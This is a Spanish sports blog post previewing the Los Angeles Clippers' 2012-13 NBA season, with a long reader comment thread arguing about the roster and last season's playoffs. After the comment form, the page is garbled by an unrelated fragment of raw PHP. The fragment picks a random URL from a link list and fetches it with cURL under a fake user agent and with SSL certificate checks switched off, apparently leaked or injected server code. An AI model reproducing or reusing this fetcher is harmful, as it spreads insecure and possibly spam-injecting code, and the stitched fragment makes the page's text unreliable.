Los Angeles Clippers: Consolidación o disolución

23 de October de 2012 por TheDeerHunter

Tras una campaña más que aceptable alguno se llevará las manos a la cabeza ante el titular. Para nada. El curso 2012-13 puede ser clave en la historia de la franquicia. El año que podrían dejar de ser el eterno equipo maldito de la liga. No es cuestión baladí.

Mucha gente parece haber olvidado un factor crítico. El próximo verano termina el contrato de Chris Paul. Tras su experiencia en New Orleans podemos asumir que el jugador no va a conformarse con cualquier cosa, ni económica ni deportivamente. La tradición marca que los conceptos “proyecto ganador” y “L.A. Clippers” han sido siempre excluyentes. El señor Donald Sterling tampoco es internacionalmente conocido por su manga ancha a la hora de afrontar gastos. A los hechos me remito.

Algo huele a podrido en la acera colorada del Staples. El que para muchos fue el último mejor ejecutivo del año, Neil Oshley, gran artífice de la operación CP3 y de la elección de Blake Griffin, una de las mejor aprovechadas de la historia de la franquicia, puso pies en polvorosa dirección Portland en cuanto tuvo ocasión. Nadie pareció tener la más mínima intención de impedirlo y se optó por la opción barata/promoción interna, Gary Sacks. Movimiento ilustrativo del grado de ambición con el que afrontan este año clave. 

No me gustaría ser especialmente crítico con el trabajo del nuevo GM hasta el momento. Podemos decir que el hombre ha demostrado cierta coherencia y continuismo. Si algo podemos reprocharle, y posiblemente no sea responsabilidad completamente suya, es un cierto grado de conservadurismo. Han renovado a Griffin y conseguido dotar de mayor profundidad al banco, pero renunciando a algunos hombres que, no olvidemos, fueron imprescindibles para alcanzar la segunda ronda. Por otro lado no se resuelven algunos problemas como el nivel de las alas titulares o la capacidad defensiva general del equipo.

Así el pico de nivel va unido a una serie de variables relativamente inciertas: El estado de forma y la implicación de dos de los mejores 6ºs hombres del último lustro; la salud de Chauncey Billups, un año más viejo y tras una grave lesión de talón de Aquiles; la irrupción de Eric Bledsoe como pieza clave; la aportación de Grant Hill muy a la vuelta de todo…

De todas maneras hay pocos equipos que cuenten con una dupla de bases tan fabulosos como CP3 y Bledsoe. El perímetro, sin embargo, genera algunas dudas con los teóricos Billups-Butler de titulares y Crawford liándola desde el banco. Veremos también qué papel puede ofrecer Willie Green teniendo en cuenta que tanto Matt Barnes como Grant Hill conocen su oficio y cumplirán, pero no les sacarán de pobres ni de ricos.

Por dentro la potencia de DeAndre Jordan y Blake Griffin y la clase de Lamar Odom. Deberían rezar para que esta opción les funcione. Ronny Turiaf y Ryan Hollins aportarán curro y poco más.

No vislumbramos una variación muy grande de resultados con respecto al año pasado. En esencia esperamos ver lo mismo. Lamentablemente en el Oeste de este año eso puede no ser suficiente para consolidar el proyecto o para convencer a Paul de que lo lidere algunos años más y a medio plazo aspirar a todo. Mimbres hay para plantar cara a cualquiera, pero nadie se lo pondrá fácil.

Altas: Jamal Crawford, Odom, Matt Barnes, Grant Hill, Willie Green, Turiaf, Ryan Hollins
Bajas: Mo Williams, Nick Young, Foye, Ryan Gomes, Reggie Evans, Kenyon Martin

Quinteto: Chris Paul, Chauncey Billups, Caron Butler, Blake Griffin, DeAndre Jordan
6º hombre: Jamal Crawford

Pronóstico: 45-50 victorias. 2ª Ronda.

Comenta

30 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Equipo con grandes jugadores que si funciona puede tranquilamente ser tercero del Oeste por detrás de OKC y sus vecinos Lakers. En principio tienen jugadores para ellos.
    Como el año pasado CP3 es el guía y el alma del equipo. Un gran base con un gran carácter para liderar el equipo y poner las pilas a todos. Además es un ganador por lo que no va a dejar que la gente se relaje.
    Junto a él varios jugadores de calidad en el backcourt pero que generan algunas dudas por diferentes motivos. Bledsoe está ante un año clave. Tras sus buenos PO del año pasado este debe explotar y jugar muchos minutos junto a CP3 y sin él. En principio es un recambio de garantías para Paul. En el escolta Billups aportará experiencia y tiro si está bien recuperado de su tobillo y Crawford sus puntos y lanzamientos desde el banco. Si Jamal está implicado y concentrado debe ser importante.
    En el alero tienen tres jugadores con experiencia y saber hacer. Aunque no es su posición más fuerte entre Butler, Grant Hill y Matt Barnes deberían de poder dar un rendimiento satisfactorio.
    Y ahora la pintura que es donde me dejan más dudas. Año clave para Griffin. Tras prometer mucho a su llegada el año pasado creo que fue una pequeña decepción. Tiene que mejorar su juego de cara al aro y complementar sus tremendas capacidades físicas con un tiro más decente y mejores decisiones al atacar el aro. De su evolución a estrella de verdad dependerán las posibilidades de su equipo de aspirar a algo de verdad. DeAndre Jordan también debería evolucionar algo aunque en su caso lo veo más complicado. Jugador con un físico increíble sus limitaciones en ataque dañan mucho a su equipo y este año se le necesitará más centrado en los momentos importantes. Debe dar un paso adelante. Y luego la incógnita de Lamar Odom. ¿Quiere este hombre seguir jugando a baloncesto al más alto nivel? Si le motivan y su vuelta a Los Angeles le vuelve a poner las pilas es uno de los fichajes más infravalorados de este año. Un Odom a su nivel puede suponer una gran ventaja para estos Clips y puede ser clave a la hora de los enfrentamientos contra los grandes con su capacidad de tiro, rebote y defensa. Lo dicho si se parece al de los Lakers, veo a los Clippers aspirantes.
    En definitiva creo que la plantilla ha mejorado respecto al año pasado pero que va a depender de que Crawford y Odom rindan de acuerdo a sus máximos y de la evolución de Griffin el que puedan aspirar a sorprender a Thunder, Lakers y Spurs o el que se queden como equipo medio a pelearse con Memphis, Denver y demás.

      Citar

  2. Denise dice:
    #2

    Deer, yo no veo a Grant Hill tan a vuelta de todo, para mi es un jugador muy pero que muy útil dentro de su rol.

    En cuánto al perímetro, yo no tengo dudas, posiblemente para mí, el mejor perímetro en cuanto a calidad y profundidad de la NBA. Muy buena pareja de bases Paul-Bledsoe con Billups aun de fondo, dos anotadores como Butler y Crawford, y una buna pareja defensiva como Hill-Barnes que si se lo pides, también pueden anotar. Con este perímetro, yo no echaría de menos ni a Mo Williams, Foye o Young.

    El punto clave o termometro del equipo es la pintura, del progreso/motivación de Odom, Griffin y Jordan dependerá el destino de estos Clippers. Odom creo que volverá a estar motivado y su nivel será como el de Lakers; la duda es si Blake Griffin y De Andre han aprovechado el verano para aprender movimientos y no anotar solo a base de mates y tirando de físico. Si éstos 2 aprenden movimientos, para mi es un claro indiscutible contender al anillo. Además, para frenar a otros grandes pivots del Oeste, cuentan con 2 buenas piezas como Turiaf y Hollins. 12 buenos hachazos para Howard, aunque me hubiera quedado también con Reggie Evans.

    En definitiva, ahora mismo apostaría por un Lakers-OKC como final del Oeste, pero no descartaría que los Clippers se zumbasen a uno de éstos. Para mí el cuarto mejor equipo de la NBA por detrás de LAK-OKC y Miami.

      Citar

  3. TheDeerHunter dice:
    #3

    Grant Hill tiene 40 tacos, Denise, con unas cuantas lesiones de gravedad en su currículum… es más que probable una merma significativa en sus prestaciones, ya de por si en manifiesta decadencia. No es algo opinable… y con esto no quiero quitarle méritos a su “siempre excepcional dentro de su rol” rendimiento, pero estamos hablando de un equipo que aspira a plantarle cara a los bichos del Oeste.

    El año pasado, tampoco es opinable, el banco de Clippers fue fundamental para pasar de primera ronda. De toda esa extraordinaria segunda unidad que les ayudó a doblegar a los Grizzlies sólo queda Bledsoe. En cuanto a profundidad estoy de acuerdo que han salido reforzados, pero en cuanto a calidad depende mucho de qué es lo que veamos en Crawford y Odom, pero el liston está muy alto.
    Si yo fuera el GM de Clippers no me hubiera ni planteado renovar a Nick Young. Me parecía perfecto para este equipo. Del resto, puedo entender que se haya prescindido de ellos… pero en ningún caso la franquicia se ha mostrado lo ambiciosa que debería, especialmente comparada con otros equipos de su entorno.

    Yo creo que las líneas 2-3 hay que compararlas con:
    – Dallas: Mayo, Marion, Carter, Dahntay, West
    – Nuggets: Iguodala, Gallinari, Brewer, Chandler, Jordan Hamilton
    – Grizzlies: Gay, Allen, Pondexter, Ellington, Selby
    – Spurs: Ginobili, Leonard, Jackson, Neal, Green, De Colo

    Sigo pensando que son posiciones que deberían haber mejorado para tener garantías de ser efectivamente el 3er equipo en discordia del Oeste y el 4º de la liga. Yo no creo que sea ni una cosa ni la otra, aunque sí lo deberían ser.

      Citar

  4. Denise dice:
    #4

    Macho, pero es que parece como si Grant Hill tuviese que liderar al equipo noche tras noche y meter 25 puntos pp. Para jugar sus 20 minutitos, anotar 5-6 puntillos y defender al alero rival creo que está abstante bien. Además, en los ultimos años ha jugado bastante sin lesiones graves.

    Entonces, el rasero de la edad de Hill debería de aplicarse con Nash; y yo en absoluto dudo de Steve por la edad que tiene. Y eso que su rol es mayor.

      Citar

  5. txusma dice:
    #5

    Lamar Odom lleva fuera de forma más de un año y no parece que se esté dando mucha prisa en Los Angeles.

      Citar

  6. TheDeerHunter dice:
    #6

    A ver Denise, para empezar no quiero centrar el debate en Hill y mucho menos que parezca que le hago ascos.
    Me parece un extraordinario jugador que de no haber sido por su calvario hubiera sido fácilmente uno de los 20-30 mejores jugadores de la historia. Además ha sabido reinventarse para ser útil en circunstancias muy difíciles y eso tiene mucho mérito… con todo podemos esperar que signifique un salto cualitativo en el equipo teniendo en cuenta que la segunda unidad del año pasado lo hizo francamente bien.
    Pienso más en el conjunto. Quitando la dupla CP3-Bledsoe ni remotamente lo que queda del perímetro es de lo mejorcito de la liga, mucho menos de la parte noble a la que pertenecen.

    Pienso que no va a ser fácil que demuestren que han ganado con los cambios y por ahí pienso que se la han jugado para convencer a CP3 de que se quede.
    Con CP3 y Griffin hay posibilidades de construir un proyecto campeón; sin uno de los dos está complicado. No es fácil atraer estrellas contrastadas a esa casa.

      Citar

  7. txusma dice:
    #7

    Por cierto, todos veis la foto de Eric Bledsoe o a alguno os da problemas?

      Citar

  8. TheDeerHunter dice:
    #8

    ¿pretendes comprobar si veo visiones?

      Citar

  9. Sancho88 dice:
    #9

    Grffin es la clave, Paul creo que se quedará, y el puesto de 5 la incógnita. Podrían intentar un traspaso por Caron Butler para encontrar un pívot decente, lo cual está muy complicado hoy en día.

    Sobre la comparación de Deer con los escoltas, me parece que hay que excluir a los Grizzlies. Ya se comentará en el análisis cuando toque, pero los Grizzlies pueden tener serios problemas para entrar en playoffs. No pasarán de primera ronda ni de coña. Cagada Mayo, cagada Conley, Wallace una vez más chof chof…

    Estos Clippers son el cuarto equipo del oeste, y con el contrato de Griffin, si éste no progresa en su tiro a canasta, no pasarán de ahí jamás.

      Citar

  10. diestro dice:
    #10

    txusma:
    Por cierto, todos veis la foto de Eric Bledsoe o a alguno os da problemas?

    No se ve, se ve lo una imagen con
    wildcatworld com

      Citar

  11. txusma dice:
    #11

    TheDeerHunter:
    ¿pretendes comprobar si veo visiones?

    Había que comprobar si era un problema puntual o generalizado. Pq narices yo la veré bien?

      Citar

  12. Lanegan dice:
    #12

    txusma: Había que comprobar si era un problema puntual o generalizado. Pq narices yo la veré bien?

    Yo ahora la veo bien pero antes veía los mismo que tu.

      Citar

  13. Lanegan dice:
    #13

    Por otra parte, los Clippers no podrán ser una verdadera fuerza dominante mientras ninguno de sus 2 interiores sea capaz de tener un % de tiros libres decente. Actualmente meter una balón dentro en los minutos calientes de un partido no es una opción por culpa de eso. Su rendimiento dependerá de eso, de la evolución ofensiva en general de la pareja Griffin-Jordan y del rendimiento de Odom. Potencial tienen, y mucho.

      Citar

  14. nba dice:
    #14

    El analisis de Deer esta bastante bien, lo unico que parece que trasmite cierto pesimismo sobre lo que puede suceder cuando acabe la temporada, no deberiamos centrarnos en disfrutar de esta ?
    Un equipo que cuenta con un base top-3 de la liga y un AP top-5 de la conferencia Oeste, como minimo hay que tenerlo en cuenta y esperar que nos ofrezcan espectaculo noche tras noche, si han perdido piezas que pueden echar en falta?, si, pero su techo deberia ser acabar 4º en el oeste, y luchar con San Antonio por llegar a la final de conferencia.
    Que empiece el espectaculo

      Citar

  15. Esteban dice:
    #15

    Bueno, debo decir q no comparto en absoluto, quiza solo si q es una año clave y de no funcionar perderan a paul y el proyecto quedara a la deriva, el resto ni cerca

    Decir q este equipo no es mejor q el del año pasado es eregia, y q van a extrañar jugadores? Si martin y evans como mucho, pero odom en una pierna es mejor q ambos y el tamaño de tiruaf y hollins es q lo q contaban el año pasado

    Si hacemos memoria, la rotacion de los clippers gran parte del año fue Mo saliendo de 1 y 2 suplente, y foye y gomes repartiendo algunos minutos de 3 y evans como unico recambio interior

    De la lesion de billups en adelante irrumpio foye de buena forma, pero unos PO mas q olvidables no lo haran extraÑar y la recuperacion de bledsone y la llegada de martin y young les dieron algo de prfundidad, pero su banca seguia siendo muy mala

    A ver, bledosoe de base suplente es mas q Mo, y jamal como sexto hombre tambien es mas q Mo

    Entre hill y barnes superan por mucho a young en todos los aspectos del juego
    Si a eso se le suma la vuelta de billups q falto la segunda mitad del aÑo y a odom, tienen una de las mejores bancas de la nba

    No entiendo q van a extraÑar, han mantenido a sus 5 iniciales, mantuvieron a bledsoe y mejoraron el resto de las posiciones

    Crawford por Mo
    Hill por young
    Barnes por gomes
    Odom por evans
    Turianf por martin, aqui pueden haber perdido

    Y dices q no hay mejoria?

      Citar

  16. Esteban dice:
    #16

    Deer tienes una estima demasiado alta a lo realizado por la banca de los clippers frente a menphis

    En la remontada del primer juego young puso sus tiros y en el resto de la serie evans y martin ensuciaron la cosa

    Pero la serie la gano CP3, sino vale ver los ultimos 8 minutos de todas las victorias de los clippers, fue un monologo de su base

    Sobre las dudas de griffin, una regular para el olvido pero unos muy buenos PO le dejan el credito abierto

      Citar

  17. Jose Luis dice:
    #17

    Los PO de Griffin no los vi para nada muy buenos. Creo que Crawford no mejora a Mo, ni Barnes a Foye, ni Turiaf a Martin, y Odom a Evans veremos…

      Citar

  18. Esteban dice:
    #18

    jose luis

    FOYE FUE EL ESCOLTA TITULAR de los clippers en PO, mientras que barnes sera el tercer alero, no esta nada mal que el no lo mejore

    el lugar de foye sera de billups de titular

    en lugar de Mo, de base suplente jugara bledsoe,

    entre crawford y hill vienen a reemplazar a young

    ASI JUGO LOS PO

    cp3- bledsoe-Mo
    foye- Mo
    butler- young
    griffin- evans
    jordan- martin

    este es el ideal de esta tamporada

    CP3-bledsoe
    billups- crawford
    butler-hill-barnes
    girffin-odom
    jordan-turiaf-hollins

    la mejora es notable, si billups se recupera y no sufren nuevas lesiones, asi podrain jugar los PO,

    lo vea quien lo quiera ver estan infinitamente mejor que el año pasado

      Citar

  19. GreenPride dice:
    #19

    Esta vez estoy de acuerdo con Esteban, a mí me parece que a poco que Crawford y Odom funcionen bien el salto de calidad respecto a lo que había el año pasado (Mo, Foye, Young, Evans, Martin) es evidente. Les queda una rotación algo más corta en el pivot pues Martin sí es claramente mejor que Turiaf y Hollins pero han hecho bien en dar los minutos decisivos a Griffin y Jordan para ver si de verdad valen lo que les pagan. Yo los veo un equipo con grandes posibilidades, para mí el 5º 6º mejor a priori por detras de Heat, Lakers, Thunder, Celtics y quizás Spurs pero con posibilidades de superar a estos dos últimos dependiendo de cómo vaya la temporada

      Citar

  20. TheDeerHunter dice:
    #20

    @Esteban… me apuesto contigo lo que quieras a que no vamos a ver un 53% en triples por parte ni de Butler, ni de Barnes, ni mucho menos de Hill en ningún momento delicado de playoffs como sí vimos de Young en esa serie que dices tengo sobrevalorada. Young fue mejor que varios titulares jugando poco más de 18 minutos. Precisamente él aportó lo que le falta a la línea de aleros de éste curso. Claridad ofensiva. Barnes y Hill son redundantes en ese sentido.
    Billups ya estaba el año pasado, así que no lo puedes incluir en el haber de la política de fichajes de este verano, estaría bueno… además vuelve con un año más y tras una lesión muy jodida. Por otro lado no me parece el mejor escolta de la liga. Por otro lado tampoco se pueden quejar. Mo Williams fue el 3er mejor jugador del equipo… y bueno, Crawford todavía tiene que demostrar que lo va a hacer mejor que lo hizo él.
    ¿Debo recordarte el papel defensivo de Evans y Martin, en líneas generales superando ambos el rendimiento de Jordan y siendo fundamentales especialmente en la mítica remontada? ¿Puedes apostar tu casa a que Odom va a rendir? Si la respuesta es afirmativa, amigo Esteban, una de dos: O no conoces a Lamar, no has seguido con atención su carrera o eres un inconsciente.
    Por supuesto que un dedo suyo tiene más calidad que los otros dos… otra cosa es que le apetezca demostrarlo. Eso es mucho más difícil. Si lo hiciera sin ninguna duda los Clippers salen ganando. Si no lo hace niego categóricamente a que tienen mejor equipo este año que el pasado… y a final de curso lo analizaremos.

    Debéis haceros una reflexión… ¿han sido los clippers ambiciosos este verano? Si ni siquiera han sido capaces de conservar a su GM hombre. Intuyo que tampoco van a tirar la casa por la ventana próximamente y para ser campeones hace falta más. Estamos hablando de eso ¿no?

      Citar

  21. TheDeerHunter dice:
    #21

    @GreenPride: ¿A poco que rindan bien??
    No tío. Van a tener que poner toda la carne en el asador como sí hicieron los otros. Si lo hacen, que cualquiera puede tener dudas razonables al respecto, sí son mejores. Si no ni de coña.

      Citar

  22. GreenPride dice:
    #22

    De acuerdo con Deer en que no han sido todo lo ambiciosos que podrían pero tampoco tenían tanto margen para ir a por un jugador de renombre de verdad. Sí es cierto que Odom y Crawford tienen que rendir viniendo de temporadas mediocres pero por lo que veo estamos de acuerdo en que si rinden tienen mucha más calidad que sus predecesores de la temporada pasada. En definitiva, es un equipo con más calidad, eso es incuestionable, lo que queda por ver es si la consiguen explotar o no

      Citar

  23. Nacho dice:
    #23

    Me caen antipáticos los Clippers. Pero aunque alguien lo apunta (Deer entre otros), Evans y Martin fueron fundamentales en PO contra los Grizzlies. Ellos solitos les pusieron el miedo en el cuerpo a los de Menphis. Otra cosa, Esteban, es que llegara Paul para cerrar los partidos, faltaría más. Por eso dicen de él que el el mejor base (yo no lo afirmaría), pero no cabe duda de que es un grandísimo jugador, y para el clucht lo tienes a él. Odom en sus mejores momentos va a estar ahí. Lo dudo. Con Un Odom responsable tiene mejor juego y mucho más estético. pero los partidos se ganan también con otras cosas y sin Evans y Martin, el año pasado caen contra Marc y compañía sin dudarlo. Por mucho Chris Paul que tuvieran.

      Citar

  24. Esteban dice:
    #24

    TheDeerHunter:
    @Esteban… me apuesto contigo lo que quieras a que no vamos a ver un 53% en triples por parte ni de Butler, ni de Barnes, ni mucho menos de Hill en ningún momento delicado de playoffs como sí vimos de Young en esa serie que dices tengo sobrevalorada. Young fue mejor que varios titulares jugando poco más de 18 minutos. Precisamente él aportó lo que le falta a la línea de aleros de éste curso. Claridad ofensiva. Barnes y Hill son redundantes en ese sentido.
    Billups ya estaba el año pasado, así que no lo puedes incluir en el haber de la política de fichajes de este verano, estaría bueno… además vuelve con un año más y tras una lesión muy jodida. Por otro lado no me parece el mejor escolta de la liga. Por otro lado tampoco se pueden quejar. Mo Williams fue el 3er mejor jugador del equipo… y bueno, Crawford todavía tiene que demostrar que lo va a hacer mejor que lo hizo él.
    ¿Debo recordarte el papel defensivo de Evans y Martin, en líneas generales superando ambos el rendimiento de Jordan y siendo fundamentales especialmente en la mítica remontada? ¿Puedes apostar tu casa a que Odom va a rendir? Si la respuesta es afirmativa, amigo Esteban, una de dos: O no conoces a Lamar, no has seguido con atención su carrera o eres un inconsciente.
    Por supuesto que un dedo suyo tiene más calidad que los otros dos… otra cosa es que le apetezca demostrarlo. Eso es mucho más difícil. Si lo hiciera sin ninguna duda los Clippers salen ganando. Si no lo hace niego categóricamente a que tienen mejor equipo este año que el pasado… y a final de curso lo analizaremos.

    Debéis haceros una reflexión… ¿han sido los clippers ambiciosos este verano? Si ni siquiera han sido capaces de conservar a su GM hombre. Intuyo que tampoco van a tirar la casa por la ventana próximamente y para ser campeones hace falta más. Estamos hablando de eso ¿no?

    bueno, no se si te copiaste de mis comentarios o que, pero ya he hablado y mucho de lo valiosos que fuieron evans y martin, incluso le di un parrafo a evans en el ANALISIS q hice de los Nets
    tambien le di su importancia a Mo en el analisis que hice del Jazz y recorde su buen papel de sexto hombre
    Tambien hable en el analisis del jazz del sube y baja de la temporada de Foye

    no me dices nada que no sepa

    te digo, estas muy enamorado de la serie de los clippers frente a menphis, cuando quien ganoi esa serie de fiorma magistral fue CP3, la ayuda vino de varios lados diferentes en diferentes juegos, y creo que el segundo jugador mas valioso de esa serie fue Griffin, los demas actores de reparto que ayudaron

    tanto miras esa serie que no miras lo que les paso luego, cuando se enfrentaron a los SPURS, ni young, ni foye, ni Mo de escolta cumplieron su labor

    con los HOMBRES que han fichado este año, creo que estan mas cerca de los SPURS que el 0-4 del año pasado

      Citar

  25. Jabho dice:
    #25

    Por plantilla 2º escalon del Oeste junto con Spurs y debajo de Lakers y Thunder. Pon un entrenador de verdad a este equipo ¿Adelman? y contenders…

      Citar

  26. Sancho88 dice:
    #26

    Esteban siempre con que le copiamos los análisis, jaajjaj, que jodido ególatra (te lo digo con cariño, que conste). Por cierto, siempre saltan chispas en vuestras enconadas discusiones. Dejaros de líos. Griffin sí o Griffin no. Ahí vivirán o morirán los Clippers. Lo demás son subalternos (excepto Paul). Y pasaron contra Grizzlies por las cagadas de Gay y de un entrenador que sobreestimó sus capacidades de liderazgo, no por la banca de los Clippers.

    Mirad la serie contra los Spurs, ahí sí que dieron todos el do de pecho, jeejje

      Citar

  27. TheDeerHunter dice:
    #27

    Esteban: bueno, no se si te copiaste de mis comentarios o que, pero ya he hablado y mucho de lo valiosos que fuieron evans y martin, incluso le di un parrafo a evans en el ANALISIS q hice de los Nets
    tambien le di su importancia a Mo en el analisis que hice del Jazz y recorde su buen papel de sexto hombre
    Tambien hable en el analisis del jazz del sube y baja de la temporada de Foye

    no me dices nada que no sepa

    te digo, estas muy enamorado de la serie de los clippers frente a menphis, cuando quien ganoi esa serie de fiorma magistral fue CP3, la ayuda vino de varios lados diferentes en diferentes juegos, y creo que el segundo jugador mas valioso de esa serie fue Griffin, los demas actores de reparto que ayudaron

    tanto miras esa serie que no miras lo que les paso luego, cuando se enfrentaron a los SPURS, ni young, ni foye, ni Mo de escolta cumplieron su labor

    con los HOMBRES que han fichado este año, creo que estan mas cerca de los SPURS que el 0-4 del año pasado

    Esteban, no se como tomarme eso de que copio tus comentarios. Supongo que será una broma.

    No estoy en absoluto enamorado de la serie de Clippers contra Memphis. Hay que otorgar a cada uno su cota de mérito. Paul obviamente lo tuvo, estaría bueno que no, pero la segunda unidad también lo tuvo. Podemos decir misa en Do menor pero hubieran caido en primera ronda sin ese óptimo rendimiento de la segunda unidad.

    Es curioso que apuntes tanto el inmenso liderazgo de CP3 en esa serie y eches por tierra el rendimiento de ese banco contra los Spurs. Te diré algo. La serie contra los Spurs fue fundamentalmente un increíble fracaso de CP3 y para nada de esa segunda unidad. Mo Williams, Young y el resto aportaron más que Paul durante los 3 primeros partidos (que fueron penosos por su parte) El último, ni bien ni mal… es que apenas el técnico les dejó jugar, mientras Paul pudo maquillar un poco su actuación en la serie cuando ya estaba todo perdido.

    En fin. No voy a seguir discutiendo esta cuestión. Hay que ver el rendimiento de esta nueva unidad y compararla a la otra… y de paso compararlo con los refuerzos de los rivales directos. Al final de temporada hablamos y vemos quienes estábamos más cerca de la verdad.

      Citar

  28. nba dice:
    #28

    Venga que viendo el partidito anoche de Lakers, los aficionados estamos deseando que consigan un rosco completo en la pretemporada, a ver si Brown actua con inteligencia y , en el ultimo partido de pretemporada no juegan ni un minuto Nash-Gasol-Meta, ya que sino van a llegar fundidos al comienzo de la regular.

      Citar

  29. GreenPride dice:
    #29

    Muy bueno nba. Yo la verdad es que a los resultados de pretemporada en la NBA no les doy ningún valor. Los titulares juegan poco y con muy poca intensidad y se la trae al pairo ganar o perder sobre todo a los veteranos. No se puede hacer ninguna valoración de los resultados de pretemporada, habrá que esperar 5 días para empezar a hablar de resultados… aunque ya les vale no ganar ni un partido, al menos uno no estaría de más jeje

      Citar

  30. Esteban dice:
    #30

    TheDeerHunter: estoy en absoluto enamorado de la serie de Clippers contra Memphis. Hay que otorgar a cada uno su cota de mérito. Paul obviamente lo tuvo, estaría bueno que no, pero la segunda unidad también lo tuvo. Podemos decir misa en Do menor pero hubieran caido en primera ronda sin ese óptimo rendimiento de la segunda unidad.

    Es curioso que apuntes tanto el inmenso liderazgo de CP3 en esa serie y eches por tierra el rendimiento de ese banco contra los Spurs. Te diré algo. La serie contra los Spurs fue fundamentalmente un increíble fracaso de CP3 y para nada de esa segunda unidad. Mo Williams, Young y el resto aportaron más que Paul durante los 3 primeros partidos (que fueron penosos por su parte) El último, ni bien ni mal… es que apenas el técnico les dejó jugar, mientras Paul pudo maquillar un poco su actuación en la serie cuando ya estaba todo perdido.

    porn suepuesto que era broma! no te ofendas, opiniones son opiniones, solo que si me tocaba a mi hacer el analisis de los CLIPPERS lo hubiese hecho muy diferente, es todo
    saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>